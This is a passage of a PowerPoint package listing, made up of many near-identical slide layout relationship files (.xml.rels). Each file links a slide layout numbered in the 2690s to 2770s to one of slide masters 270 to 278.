</file>

<file path=ppt/slideLayouts/_rels/slideLayout2691.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster270.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2692.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster270.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2693.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster270.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2694.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster270.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2695.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster270.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2696.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster270.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2697.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster270.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2698.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster270.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2699.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster270.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70.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700.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster270.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2701.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster271.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2702.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster271.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2703.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster271.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2704.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster271.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2705.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster271.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2706.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster271.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2707.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster271.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2708.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster271.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2709.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster271.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout271.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710.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster271.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2711.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster272.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2712.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster272.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2713.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster272.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2714.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster272.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2715.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster272.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2716.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster272.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2717.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster272.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2718.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster272.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2719.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster272.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout272.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720.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster272.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2721.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster273.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2722.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster273.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2723.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster273.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2724.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster273.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2725.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster273.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2726.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster273.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2727.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster273.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2728.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster273.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2729.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster273.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout273.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730.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster273.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2731.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster274.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2732.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster274.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2733.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster274.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2734.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster274.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2735.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster274.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2736.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster274.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2737.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster274.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2738.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster274.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2739.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster274.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout274.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740.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster274.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2741.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster275.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2742.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster275.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2743.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster275.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2744.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster275.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2745.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster275.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2746.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster275.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2747.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster275.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2748.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster275.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2749.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster275.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout275.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750.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster275.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2751.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster276.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2752.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster276.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2753.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster276.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2754.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster276.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2755.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster276.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2756.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster276.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2757.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster276.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2758.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster276.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2759.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster276.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout276.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760.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster276.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2761.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster277.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2762.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster277.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2763.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster277.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2764.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster277.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2765.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster277.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2766.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster277.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2767.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster277.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2768.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster277.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2769.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster277.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout277.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770.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster277.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2771.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster278.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2772.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster278.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2773.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster278.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2774.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster278.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2775.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
